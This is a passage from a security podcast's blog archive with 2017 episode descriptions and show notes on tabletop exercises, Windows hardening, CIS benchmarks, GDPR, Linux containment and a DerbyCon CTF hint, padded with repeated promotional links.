During a tabletop exercise there should be a moderator or facilitator that will deliver the scenario to be played out. This moderator can answer “what if ” questions about the imaginary emergency as well as lead discussion, pull in additional resources, and control the pace of the exercise. Inform the participants that it is perfectly acceptable to not have answers to questions during this exercise. The entire purpose of tabletops is to find the weaknesses in current processes to mitigate them prior to an actual incident.
• A member of the exercise should also evaluate the overall performance of the exercise as well as create an after-action report. This evaluator should take meticulous notes as well as follow along any runbook to ensure accuracy. While the evaluator will be the main notetaker, other groups and individuals may have specific knowledge and understanding of situations. In this case having each member provide the evaluator with their own notes at the conclusion of the tabletop is a good step.
• Participants make up the majority of this exercise. Included should be groups such as Finance, HR, Legal, Security (both physical and information), Management, Marketing, and any other key group that may be required. Participants should be willing to engage in the conversation, challenge themselves and others politely, and work within the parameters of the exercise.
What to include in the tabletop:
• A handout to participants with the scenario and room for notes.
• Current runbook of how security situations are handled.
• Any policy and procedure manuals.
• List of tools and external services.
Post-exercise actions and questions:
• What went well?
• What could have gone better?
• Are any services or processes missing that would have improved resolution time or accuracy?
• Are any steps unneeded or irrelevant?
• Identify and document issues for corrective action.
• Change the plan appropriately for next time.
Tabletop Template
The Federal Emergency Management Agency (FEMA) has a collection of different scenarios, presentations, and tabletops that can be used as templates.
Derbycon channel on Slack
Intro to RE class
https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax
Published on: September 12, 2017
2017-031-Robert_Sell-Defcon_SE_CTF-OSINT_source
This week, we met up with Robert Sell to discuss competing in the DefCon Social Engineering CTF. You're gonna learn how he prepared for the competition, and learn about some of the tactics you could use to compete in future SE CTF events.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-031-Robert_Sell-Defcon-SE-CTF.mp3
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: September 4, 20172017-030-Vulnerability OSINT, derbycon CTF walkthrough, and bsides Wellington!
This week, we discuss the lack of information and where you might find more information about certain vulnerabilities. Seems like many companies fail to give out necessary and actionable information without paying an arm and a leg.
We also go over our DerbyCon CTF walkthrough, and discuss the steps to solve it.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-030-vulnerability_OSINT-derbycon_CTF_walkthrough.mp3
Ms. Berlin is going to be at Bsides Wellington! Get your Tickets NOW!
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--show notes--
NCC group talks in Seattle
NIST guidelines - no security questions, no SMS based 2fa
Vuln OSINT
Sites have information like Spokeo…
Breadcrumbs
Take Java for example (CVE-2017-10102): info is sparse
Other sites have more
https://tools.cisco.com/security/center/viewAlert.x?alertId=54521 - worse than Oracle’s site (impressive crappery)
Some are better: RHEL is fairly decent
https://access.redhat.com/errata/RHSA-2017:2424
Ubuntu has some different tidbits
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-10102.html
Arch has info
https://security.archlinux.org/CVE-2017-10102
Point is, just because you use a specific OS, don’t limit yourself… other OSes may contain more technical info. Some maintainers like to dig, like you.
https://vuldb.com/ - gives value of finding such a PoC for a vuln (5-25K USD for 2017-10102)
Derbycon CTF walkthrough
Looking for an instructor for an ‘intro to RE’ course.
Dr. Pulaski = Diana Maldaur
Dr. Crusher = Gates McFadden
Published on: August 29, 2017
2017-029-CIS benchmarks, Windows Update reverts changes used to detect malware
This week was one heck of a show. If you are a blueteamer and make use of the "Windows Logging Cheat Sheet", you are no doubt aware of how important it is to log certain events, and to set hostile conditions to make malware/Trojans/virus have a harder time avoiding detection.
What if I told you the same updates we suggested last week to NEVER delay actually undoes all your hardening on your system and leaves your logfiles set to defaults, all file associations for suspect files like pif, bat, scr, bin, are set back to defaults, allow your users to be victims again, even after you've assured them they are safe to update?
After a sequence of tweets from Michael Gough about just this exact thing, we laid out all the information, how and what get reverted that will open you back up to possible infections, as well as how some hardening standards actually make it harder to be secure.
Finally, we discuss the CIS benchmarks, and how many of the settings in them are largely outdated and why they need to be updated.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-029-windows_updates_clobbers_security__settings_CIS_hardening_needs_an_update.mp3
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--SHOW NOTES--
Gough says ‘something is bad about CIS’
CIS benchmarks need revamping -- BrBr
/var, /var/log in separate partitions?
Password to access grub?
Disable root login to serial pty?
Many cloud instances and VMs don’t have serial ports (not in a traditional sense)
What’s the use case for using them? What problem will they solve?
Misconfiguration?
Proper logging?
NTP sources?
So many, dilution possible
SCAP
OVAL
STIG (complex as well)
CIS
Infosec: how do we get IT past the “that’s good enough”, as many customers and compliance frameworks want to see ‘hardening’ done.
What is a good baseline?
Write your own?
How do we tell them that it’s not going to stop ‘bad guys’ ( or anyone really)? It’s not ‘security’, and it’s technically not even ‘best practices’ anymore (not all of it, anyway)
On windows, they are needlessly complicated and cause more problems
Roles have to be created “backup admin”
Can cause unintended issues
https://twitter.com/HackerHurricane/status/898629567056797696
https://twitter.com/HackerHurricane/status/892838553528479745
Category Sub Category 7/2008 8.1 2012 Win-7 Win-8.1 WLCS ThisPC Notes
Detailed Tracking Process Termination NA NA NA NA NA S/F S
Object Access File Share NA NA NA NA NA S/F S/F
Object Access File System NA NA NA F NA S S/F
Object Access Filtering Platform Connection NA NA NA NA NA S S
Object Access Filtering Platform Packet Drop NA NA NA NA NA NA NA
Log Sizes:
-------------
Security - 1 GB
Application – 256MB
System – 256MB
PowerShell/Operational – 512MB – 1 GB v5
Windows PowerShell – 256MB
TaskScheduler – 256MB
Log Process Command Line (5) (5) (5) (5) (5) Yes Yes
-------------------------------------------------------------------------------------------------------------------------
PowerShell Logging v5 (5) (5) (5) (5) (5) Yes Yes
-------------------------------------------------------------------------------------------------------------------------
TaskScheduler Log (5) (5) (5) (5) (5) (1) Yes
-----------------------------------------------------------------------------------------------------------------
(5) - CIS Benchmarks, USGCB, and AU ACSC do not cover this critical auditing item
Published on: August 20, 20172017-028-disabling WU?, Comcast wireless hack, and was it irresponsible disclosure?
This week went in a different direction from what we normally do. We discussed some news, a twitter conversation about someone from the 'ahem' "media" that suggests that you disable Windows Update on your home devices. We discuss the pros and mostly cons of doing that, and alternatives to protect your home and work devices from that.
We talked about the Comcast Xfinity applicances and how they have a vulnerability that could make it appear that traffic created by people outside of your house could look like it was coming from your home network.
We discuss the public disclosure of Carbon Black's architecture and seeming sharing of customer events to 3rd parties... it's not all black and white, and we discuss those here.
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---SHOW NOTES---
Twitter discussion -
https://twitter.com/Computerworld/status/894611609355603968
[sic] “tons of problems with Automatic Update patches so far this year”
[sic] “if you’re savvy enough to be reading this, you should consider turning Auto Update off, too”
Advocating disabling auto-updates in an OS is reckless.
Home networks for majority of users is completely flat
One Vlan (e.g. 192.168.1.0/24)
‘Savvy’ = technical
Which many of our users are not
Probable scenario: Bad guy targets you or family through a phish. They gain access to family computers, and pivot through those to your office computer
Blue teamers: suggest backups and backup options to keep their data safe and allow them to feel safer with automatic updates enabled, and VLANs if possible
Typically enterprises will hold off a few days or a week to push out Windows patches; Auto-updates are controlled.
The twitter guy said that in more recent Windows versions, WU take precedence over WSUS… need to confirm that… -- brbr
Confirmed… you can override WU… https://blogs.technet.microsoft.com/wsus/2017/08/04/improving-dual-scan-on-1607/
--this-- not because of title, but because of people jumping to conclusions (example of irresponsible disclosure)
Agreed… that shiz is damaging -- brbr
NoStarch TCP guide - https://www.nostarch.com/tcpip.htm
IPV4 -https://en.wikipedia.org/wiki/IPv4
[graphic of IPv4 header from wikipedia article]
IHL - size of the header (minimum of 5)
DSCP - has to do with traffic shaping and QoS
ECN - notifies the network of congestion and allows infrastructure to implement congestion controls to compensate
Must be supported by both ends, and completely optional to enforce
Total Length - total size of the packet
Identification - interesting field, you can use it to hide data (Covert_TCP), otherwise, it’s used for ‘used for uniquely identifying the group of fragments of a single IP datagram”
https://github.com/tcstool/Fireaway
http://www.securityweek.com/coolest-talk-defcon-25-no-one-writing-about
Published on: August 12, 2017
2017-026-Machine_Learning-Market Hype, or infosec's blue team's newest weapon?
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-026-Ally_miller_machine-learning-AI.mp3
Ally Miller (@selenakyle) joined us this week to discuss Machine Learning and #Artificial #Intelligence. It seems like every new security product employs one or both of these terms. She did the keynote at Bsides Las Vegas on topics of #Machine #Learning and #Behavioral #Economics.
We asked Ms. Miller to join us here to discuss what ML and AI are, how algorithms work to analyze the data to come to the right conclusion. What is required to get a useful algorithm, and how much or little human interaction is required?
We also discuss a bit of history with her, how IDS/IPS were just dumber versions of machine learning, with 'tweaks' being new Yara or snort rules to tell the machine what to allow/disallow.
Finally, we discussed how people who are doing our 2017 DerbyCon CTF, instructions on how to win are in the show, so please take a listen.
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
show notes
what is the required amount of data required to properly train the algorithms
how do you ensure that the training data is clean (or perhaps how do you determine what causes a false positive or negative)
Xoke Soru: "why are you trying to make skynet and kill us all? Do you hate humanity?"
Who will ML replace? Who in security?
Ask why people get confused between AI and Machine learning, and where the fine line is between the two or is one actually a subset of the other.
Basically.. "in what way/how do you see ML being used in an offensive capacity in the future (or now)"
https://en.wikipedia.org/wiki/Artificial_neural_network
https://en.wikipedia.org/wiki/Machine_learning
https://en.wikipedia.org/wiki/Portal:Machine_learning
https://www.slideshare.net/allyslideshare/something-wicked-78511887
https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/61751
O’Reilly Conference 31 October
Mick douglas class
Derbycon CTF
Book club
Patreon
slack
Published on: August 3, 20172017-025-How will GDPR affect your Biz with Wendyck, and DerbyCon CTF info
Direct Link:http://traffic.libsyn.com/brakeingsecurity/2017-025-How-GDPR-affects-US-Biz-with-Wendyck-Derbycon2017-CTF-info.mp3
GDPR (General Data Protection Regulation) is weighing on the minds and pocketbooks of a lot of European companies, but is the US as worried? If you read many of the news articles out there, it ranges from 'meh' to 'OMG, the sky, it is falling". GDPR will cause a lot of new issues in the way business is being done, not just in the realm of security, but in the way data is managed, maintained, catalogued, and shared.
This week we invited Ms. Wendy Everette Knox (@wendyck) to come in and discuss some of the issues that might hit companies. We also discuss how GDPR and the exit (or not) of the UK from the #European #Union will affect data holders and citizens of the UK.
If your company is preparing for the #GDPR mandate, check out the show notes for a lot of good info.
ALSO, If you are looking for a ticket to #derbycon 2017, you need to listen to this show, because it has all the info you need to get started. The info is also in the show notes, including the form you need to post your flag information.
#RSS: www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---Show Notes:----
The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679) is a regulation by which the European Parliament, the Council of the European Union and the European Commission intend to strengthen and unify data protection for all individuals within the European Union (EU). It also addresses the export of personal data outside the EU. The primary objectives of the GDPR are to give control back to citizens and residents over their personal data and to simplify the regulatory environment for international business by unifying the regulation within the EU.[1]
Would it be better if companies stored less data, or de-anon it to the point where a breach
Massive fines for breaches. Usually some percentage of profits…
(up to 4% of annual global turnover or €20 Million (whichever is greater))
“Under the GDPR, the Data Controller will be under a legal obligation to notify the Supervisory Authority without undue delay. The reporting of a data breach is not subject to any de minimis standard and must be reported to the Supervisory Authority within 72 hours of the data breach (Article 33).”
Is 72 hours for notification realistic? For massive breaches, 72 hours is just enough time to contain
Right to be forgotten (not realistic):
“A right to be forgotten was replaced by a more limited right to erasure in the version of the GDPR adopted by the European Parliament in March 2014.[19][20] Article 17 provides that the data subject has the right to request erasure of personal data related to them on any one of a number of grounds including non-compliance with article 6.1 (lawfulness) that includes a case (f) where the legitimate interests of the controller is overridden by the interests or fundamental rights and freedoms of the data subject which require protection of personal data “
GDPR full text:
http://ec.europa.eu/newsroom/document.cfm?doc_id=45631
Good intro:
Controversial topics:
http://www.eugdpr.org/controversial-topics.html
Key Changes:
http://www.eugdpr.org/key-changes.html
Difficulty of doing GDPR in the cloud
https://hackernoon.com/why-gdpr-compliance-is-difficult-in-the-cloud-9755867a3662
US businesses largely ignoring GDPR
http://www.informationsecuritybuzz.com/expert-comments/us-businesses-ignoring-gdpr/#infosec
Fears of breach cover-up (due to massive fines ‘up to 4% of profits’)
http://tech.newstatesman.com/news/gdpr-cover-ups-security
From the UK ICO, 12 steps to take now to prepare for GDPR https://ico.org.uk/media/for-organisations/documents/1624219/preparing-for-the-gdpr-12-steps.pdf (has a nice infographic on p. 2)
CTF for derby ticket
Level 1-
The internet is a big place :) I’ve hidden 3 flags out on it and it’s your job to see how many you can find. I’ll give you a few hints to start.
- Company Name = Big Bob’s Chemistry Lab
- There’s something illegal going on, find out what!!
- Submit flags here https://goo.gl/forms/iUEVHNuSYr34OZA22
2017-024-infosec_mental_health_defcon_contest-with-rand0h-and-tottenkoph
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-024-mental_health_podcast-with-Rand0h-and-tottenkoph.mp3
The infosec industry and the infosec culture is so diverse, with many different points of view, many different thoughts and opinions, and many of us deal with our own internal demons, like addictions, mental afflictions like depression or bipolar disorders. And 'imposter syndrome' is another thing that seems to add to the mix, making some believe they have to be constantly innovating or people think negatively of them.
So this week, we invited Ms. Magen Wu (@tottenkoph), and Danny (@dakacki) and we discuss some coping mechanisms at things like conferences, and if you work at home, like a lot of consultants and researchers do...
--------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat and Defcon
-------
Brakesec also announces our "PowerShell for Blue Teamers and Incident Responders" with Mick Douglas (@bettersafetynet). A 6 week course starting with the basics of powershell, and goes into discussion of frameworks using Powershell too assist in assessing your network. It starts on 10 July and run each Monday evening until 14 August 2017. You'll receive a certificate suitable for CPE credit, as well as the videos of the class available to you on our YouTube channel.
To sign up, go to our Patreon Page (http://www.patreon.com/bds_podcast) and sign up at the $20 USD level labeled "Blue Team Powershell - Attendee". If you are looking to just get the videos and follow along in class, pick the $10 USD "Blue Team Powershell - Attendee- Videos Only" Classes will be held on Monday Evenings only for 5 weeks, ending on 1 August.
#RSS: www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--Show Notes--
Chris Sanders: Cult of Passion
http://chrissanders.org/2017/06/the-cult-of-passion/
Exercise
Start playing ingress or Pokemon Go, just to get out and gamify activity
Reduce alcohol consumption
Defcon : Friends of Bill W.
Agent X : 3/5K events at Defcon
Critics comments
You won’t please everyone, so don’t try
Spend time away from infosec
Family, friends
Hobbies
If you are in a job with ‘secrets’, find someone to talk to
Another person with the same ‘secrets’ or similar job
https://www.scientificamerican.com/article/gut-second-brain/
@DAkacki (what is your podcast @rallysec)
Da667’s book
[I love murder]@tottenkoph
@jimmyvo
@andMYhacks (works with Jimmy)
@infosecmentors
Published on: July 16, 2017
2017-023-Jay_Beale_Securing Linux-LXC-Selinux-Apparmor-Jails_and_more
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-023-Jay_Beale-selinux-apparmor-securing_lxc.mp3
Jay Beale works for a pentest firm called "Inguardians", and has always been a fierce friend of the show. He's running a class at both BlackHat and Defcon all about hardening various parts of the Linux OS. This week, we discuss some of the concepts he teaches in the class.
Why do we disable Selinux? Is it as difficult to enable as everyone believes? What benefit do we get from using it?
We also discuss other hardening applications, like ModSecurity for Apache, Suhosin for PHP, and Linux Containers (LXC). What is gained by using these, and how can we use these to our advantage?
Really great discussion with Jay, and please sign up for his class for a two day in-depth discussion of all the technologies discussed on the show.
--------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat and Defcon
-------
Brakesec also announces our "PowerShell for Blue Teamers and Incident Responders" with Mick Douglas (@bettersafetynet). A 6 week course starting with the basics of powershell, and goes into discussion of frameworks using Powershell too assist in assessing your network. It starts on 10 July and run each Monday evening until 14 August 2017. You'll receive a certificate suitable for CPE credit, as well as the videos of the class available to you on our YouTube channel.
To sign up, go to our Patreon Page (http://www.patreon.com/bds_podcast) and sign up at the $20 USD level labeled "Blue Team Powershell - Attendee". If you are looking to just get the videos and follow along in class, pick the $10 USD "Blue Team Powershell - Attendee- Videos Only" Classes will be held on Monday Evenings only for 5 weeks, ending on 1 August.
#RSS: www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---
Show Notes:
AppArmor
SELinux
Privilege Escalation - InGuardians Murderboard
Port Knocking (Single Pack Authorization)
OSSEC
ModSecurity
Linux Containers
Jess frizelle -bane
Dan walsh - selinux
Selinux troubleshoot daemon
https://en.wikipedia.org/wiki/System_call
“In computing, a system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. This may include hardware-related services (for example, accessing a hard disk drive), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.”
OpenBSD pledge(2): https://man.openbsd.org/pledge.2
https://www.raspberrypi.org/products/raspberry-pi-2-model-b/
Suhosin
@inguardians
@jaybeale
----
What are you doing at Black Hat and Def Con?
- Training class at Black Hat - 2 days
- Def Con Workshop - ModSecurity and AppArmor - 4 hours
- Packet Hacking Village Workshop - Container security
- Vapor Trail at Def Con Labs (Larry and Galen)
- Dancing my butt off?
2017-022-Windows Hardening, immutable laws of security admins, and auditpol
Direct Link to Download: http://traffic.libsyn.com/brakeingsecurity/2017-022-windows_and_AD_Hardening.mp3
This week, we discuss hardening of windows hosts, utilizing CIS benchmarks. We talk about the 'auditpol' command. And we dredge up from the ancient times (2000) the Microsoft article from Scott Culp "The 10 Immutable Laws of Security Administration". Are they still applicable to today's environment, 17 years later?
Brakesec also announces our "PowerShell for Blue Teamers and Incident Responders" with Mick Douglas (@bettersafetynet). A 6 week course starting with the basics of powershell, and goes into discussion of frameworks using Powershell too assist in assessing your network. It starts on 10 July and run each Monday evening until 14 August 2017. You'll receive a certificate suitable for CPE credit, as well as the videos of the class available to you on our YouTube channel.
To sign up, go to our Patreon Page (http://www.patreon.com/bds_podcast) and sign up at the $20 USD level labeled "Blue Team Powershell - Attendee". If you are looking to just get the videos and follow along in class, pick the $10 USD "Blue Team Powershell - Attendee- Videos Only" Classes will be held on Monday Evenings only for 5 weeks, ending on 1 August.
#RSS: www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--SHOW NOTES--
10 immutable laws of Security administration: https://technet.microsoft.com/library/cc722488.aspx
Really great stuff
On This Page
Law #1: Nobody believes anything bad can happen to them, until it does
Law #2: Security only works if the secure way also happens to be the easy way
Law #3: If you don't keep up with security fixes, your network won't be yours for long
Law #5: Eternal vigilance is the price of security
Law #6: There really is someone out there trying to guess your passwords
Law #7: The most secure network is a well-administered one
Law #8: The difficulty of defending a network is directly proportional to its complexity
Law #9: Security isn't about risk avoidance; it's about risk management
Law #10: Technology is not a panacea
https://www.linkedin.com/in/scott-culp-cissp-8b69572a/
http://thehackernews.com/2017/06/hacker-arrested-for-hacking-microsoft.html
auditpol - https://technet.microsoft.com/en-us/library/cc731451(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc677002.aspx - Microsoft Security compliance Manager
https://www.databreaches.net/leak-of-windows-10-source-code-raises-security-concerns/
Published on: July 3, 2017
2017-SPECIAL- Michael Gough and Brian Boettcher discuss specific ransomware
Due to popular demand, we are adding the extra content from last week's show as a standalone podcast.
Michael Gough (@hackerHurricane) and Mr. Boettcher (BrakeSec Co-Host, and @boettcherpwned) sit down and discuss the popularity of ransomware as a topic
They discuss what email attachments to block, how to test your own email gateway, and what controls you should implement to help defend against the #petya #notpetya ransomware.
Published on: June 30, 20172017-021-small_biz_outreach-614con-prenicious_kingdoms-ransomware-bonus
This week, we discussed Ms. Berlin's recent foray to CircleCityCon, 614con (@614con), and her recent webinars with O'Reilly.
One topic we discussed this week was how to reach out to small businesses about information security. Mr. Boettcher (@boettcherpwned) had just came from a panel discussion about an initiative in Austin, Texas called "MANIFEST", which sought to engage small business owners with #information #security professionals to help them secure their environments.
So we got to discussing how you might go about it in your local hometowns. Many of us live in smaller towns, with numerous small businesses that either don't know to secure their #POS #terminals (for example), or office information not in a file cabinet. They may also just assume their outsourced IT company is doing that job, which could open them up to liability if something occurred. So we discuss ways to reach out, or get involved with your local community.
Secondly, we talk about software vulnerabilities found in the #CWE and the '7 Pernicious Kingdoms' which are the way some people have classified vulnerabilities. We one of the kingdoms, and how it is useful if you want to classify vulns to developers.
Finally, after the show, Mr. Boettcher and Mr. Michael Gough, who has been on the show previously discusses some #ransomware and why it's such a popular topic of discussion. (stay after the end music)
Brakesec also announces our "PowerShell for Blue Teamers and Incident Responders" with Mick Douglas (@bettersafetynet). A 5 week course starting with the basics of powershell, and goes into discussion of frameworks using Powershell too assist in assessing your network. It starts on 10 July and run each Monday evening until 1 August 2017. You'll receive a certificate suitable for CPE credit, as well as the videos of the class available to you on our YouTube channel.
To sign up, go to our Patreon Page (http://www.patreon.com/bds_podcast) and sign up at the $20 USD level labeled "Blue Team Powershell - Attendee". If you are looking to just get the videos and follow along in class, pick the $10 USD "Blue Team Powershell - Attendee- Videos Only" Classes will be held on Monday Evenings only for 5 weeks, ending on 1 August.
#RSS: www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: June 22, 2017
2017-020-Hector_Monsegur_DNS_OSINT_Outlaw_Tech_eClinicalWorks_fine
